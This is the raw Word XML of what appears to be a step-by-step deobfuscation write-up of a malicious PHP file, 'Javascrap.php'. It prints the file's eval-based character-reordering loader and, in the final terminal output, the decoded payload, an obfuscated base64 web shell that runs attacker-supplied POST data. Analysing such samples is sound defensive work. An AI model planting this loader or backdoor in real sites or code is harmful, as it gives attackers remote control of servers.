71, 71, 29, 29, 47);$do_me="";for($i=0;$i&lt;count($order);$i++){$do_me=$do_me.$terms[$order[$i]];}eval($do_me); ?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58B17C19" w14:textId="77777777" w:rsidR="006B046E" w:rsidRPr="001171C0" w:rsidRDefault="006B046E" w:rsidP="009475B8"/>
    <w:p w14:paraId="3A87D0A0" w14:textId="77777777" w:rsidR="00C91792" w:rsidRDefault="00C91792" w:rsidP="00C068BB"/>
    <w:p w14:paraId="2A5F6D19" w14:textId="6F9ECF69" w:rsidR="00265BD4" w:rsidRDefault="00D62DB0" w:rsidP="00C068BB">
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="00B655FA">
        <w:t>After we ordered the php code, we got the following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4C37" w14:paraId="52076641" w14:textId="77777777" w:rsidTr="00B74C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14E03825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>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78D68F6C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  <w:t xml:space="preserve">$terms = array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "&lt;", "a", </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A4913F9" w14:textId="77777777" w:rsidR="00466155" w:rsidRPr="000823DC" w:rsidRDefault="00466155" w:rsidP="00466155">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419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</w:t>
            </w:r>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t>"Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40902D78" w14:textId="77777777" w:rsidR="00466155" w:rsidRPr="000823DC" w:rsidRDefault="00466155" w:rsidP="00466155">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419"/>
              </w:rPr>
            </w:pP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  <w:t xml:space="preserve">   "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="762D31A7" w14:textId="77777777" w:rsidR="00466155" w:rsidRPr="000823DC" w:rsidRDefault="00466155" w:rsidP="00466155">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419"/>
              </w:rPr>
            </w:pP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  <w:t xml:space="preserve">   "r", "&amp;", "\'", "!", "x", "G", ":", "2", "~", "O", "h",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ED6C46F" w14:textId="77777777" w:rsidR="00466155" w:rsidRPr="000823DC" w:rsidRDefault="00466155" w:rsidP="00466155">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419"/>
              </w:rPr>
            </w:pP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  <w:t xml:space="preserve">   "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", "&gt;",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="503ABE66" w14:textId="77777777" w:rsidR="00466155" w:rsidRPr="000823DC" w:rsidRDefault="00466155" w:rsidP="00466155">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419"/>
              </w:rPr>
            </w:pP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  <w:t xml:space="preserve">   "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78A7345B" w14:textId="77777777" w:rsidR="00466155" w:rsidRPr="000823DC" w:rsidRDefault="00466155" w:rsidP="00466155">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419"/>
              </w:rPr>
            </w:pP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  <w:t xml:space="preserve">   "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41907714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</w:r>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>"7", "#", "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>", "I", "Y", "(", "j", "/", "?", "K", "c",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E350305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"B", "t", "R", "4", "8", "e", "|");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32C1BEF8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  <w:t>$order = array(59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DC7F600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11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B3549E6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24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1660C59D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93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1989CF56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91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56E3CBAA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19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C092626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48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06098781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18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A0118B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93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35CDC562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91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="321A09CF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19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BF70F6F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81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4017E8DF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24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="704D7ACA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0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="676C9808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42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C116676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3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5294AADC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50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C6BACA3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19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39CAC694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66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3330DBAE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38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="746879B9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28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6712B467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18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="539FB98B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60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="319DF971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48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="147725C4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19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39F08F25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93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CB04818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72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71CAAFC2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87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07C5AD07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63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="458B8949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28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="151E81A6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23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E6085C3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30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67F8561D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1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D0C934B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40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="267B6848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51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="675C694C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4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F406BF6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49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="457AB706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 xml:space="preserve">   58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FCC4849" w14:textId="77777777" w:rsidR="00466155" w:rsidRPr="000823DC" w:rsidRDefault="00466155" w:rsidP="00466155">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2AFDC999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  <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>do_me</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>="";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="652BCB72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  <w:t>for($</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=0;$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&lt;count($order);$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>++){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C28BE96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</w:r>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>do_me</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>do_me.$terms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[$order[$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>]];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22246918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  <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69E08712" w14:textId="77777777" w:rsidR="00466155" w:rsidRPr="000823DC" w:rsidRDefault="00466155" w:rsidP="00466155">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>eval($</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>do_me</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01B32E64" w14:textId="65AAB712" w:rsidR="00B74C37" w:rsidRDefault="00466155" w:rsidP="00466155">
            <w:r w:rsidRPr="000823DC">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2796C0EC" w14:textId="37CCA9C2" w:rsidR="00B655FA" w:rsidRDefault="00B655FA" w:rsidP="00C068BB"/>
    <w:p w14:paraId="419950B7" w14:textId="429B309C" w:rsidR="00036826" w:rsidRDefault="00036826" w:rsidP="00C068BB">
      <w:r>
        <w:t xml:space="preserve">5. If </w:t>
      </w:r>
      <w:r w:rsidR="00F72AC1">
        <w:t>execute the php code, we get an error.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2CD0" w14:paraId="6A0F36A0" w14:textId="77777777" w:rsidTr="00AE2CD0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E0956FC" w14:textId="77777777" w:rsidR="000D569B" w:rsidRPr="003E65C7" w:rsidRDefault="000D569B" w:rsidP="000D569B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003E65C7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>lehag@blackbox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003E65C7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">:~/Desktop$ php -f </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003E65C7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Javascrap.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="075AE714" w14:textId="77777777" w:rsidR="000D569B" w:rsidRPr="003E65C7" w:rsidRDefault="000D569B" w:rsidP="000D569B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E65C7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PHP Parse error:  syntax error, unexpected ''aWYoaXNzZXQoJF9QT1NUWyJcOTdcN' (T_ENCAPSED_AND_WHITESPACE), expecting identifier (T_STRING) in /home/lehag/Desktop/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003E65C7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Javascrap.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003E65C7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(54) : eval()'d code on line 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54CD7BB2" w14:textId="455FA276" w:rsidR="00AE2CD0" w:rsidRDefault="000D569B" w:rsidP="000D569B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003E65C7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>lehag@blackbox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003E65C7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:~/Desktop$</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56A4B586" w14:textId="6DCE5604" w:rsidR="00F72AC1" w:rsidRDefault="00F72AC1" w:rsidP="00C068BB"/>
    <w:p w14:paraId="1FC6C321" w14:textId="3D68EBEB" w:rsidR="003E65C7" w:rsidRDefault="003E65C7" w:rsidP="00C068BB">
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00BC7CD0">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> It has a problem when the</w:t>
      </w:r>
      <w:r w:rsidRPr="00333979">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> eval</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function handle</w:t>
      </w:r>
      <w:r w:rsidR="00333979">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the string contained in the </w:t>
      </w:r>
      <w:r w:rsidRPr="003E65C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E65C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>do_me</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>variable. If we</w:t>
      </w:r>
      <w:r w:rsidR="003927B9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">print its value, wet the following obfuscated </w:t>
      </w:r>
      <w:r w:rsidR="005C5D35">
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115081DF" w14:textId="20306C59" w:rsidR="003927B9" w:rsidRDefault="003927B9" w:rsidP="00C068BB">
      <w:r>
        <w:t>Modified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27B9" w:rsidRPr="006A1D4B" w14:paraId="4FC3847B" w14:textId="77777777" w:rsidTr="003927B9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DDA8FF2" w14:textId="77777777" w:rsidR="003927B9" w:rsidRPr="009A6817" w:rsidRDefault="003927B9" w:rsidP="003927B9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A1D4B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009A6817">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A6817">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t>eval</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A6817">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t>($</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A6817">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t>do_me</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A6817">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CE3F1E3" w14:textId="04D10465" w:rsidR="003927B9" w:rsidRPr="003927B9" w:rsidRDefault="003927B9" w:rsidP="003927B9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A6817">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
              <w:t>echo $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A6817">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t>do_me</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28DCB3EE" w14:textId="047717AC" w:rsidR="003927B9" w:rsidRDefault="003927B9" w:rsidP="00C068BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D3D256" w14:textId="65046C27" w:rsidR="009A6817" w:rsidRPr="003927B9" w:rsidRDefault="009A6817" w:rsidP="00C068BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419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5EDD" w14:paraId="42086DF2" w14:textId="77777777" w:rsidTr="00605EDD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01514468" w14:textId="77777777" w:rsidR="00834EE6" w:rsidRPr="00297986" w:rsidRDefault="00834EE6" w:rsidP="00834EE6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00297986">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>lehag@blackbox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00297986">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">:~/Desktop$ php -f </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00297986">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Javascrap.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="21D8F982" w14:textId="77777777" w:rsidR="00297986" w:rsidRPr="00510372" w:rsidRDefault="00834EE6" w:rsidP="00834EE6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00510372">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>$_= \'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9\';$__=\'JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7\';$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65ECA1CF" w14:textId="49A6DF7F" w:rsidR="00605EDD" w:rsidRDefault="00834EE6" w:rsidP="00834EE6">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00297986">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>lehag@blackbox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00297986">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:~/Desktop$</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
